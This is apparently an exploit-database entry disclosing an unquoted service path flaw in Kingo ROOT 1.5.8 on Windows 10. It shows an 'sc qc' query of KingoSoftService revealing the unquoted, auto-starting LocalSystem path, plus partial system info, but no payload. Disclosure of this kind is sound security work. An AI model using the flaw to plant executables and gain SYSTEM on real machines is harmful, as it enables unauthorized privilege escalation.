Kingo root 1.5.8 unquoted service path Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-09-04 |
Type : local |
Platform : windows
[+] Code ...
#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Date: 8/22/2023
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro
-------------Discovering Unquoted Path--------------
C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: KingoSoftService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KingoSoftService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\Anish>systeminfo
Host Name: DESKTOP-UT7E7CF
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045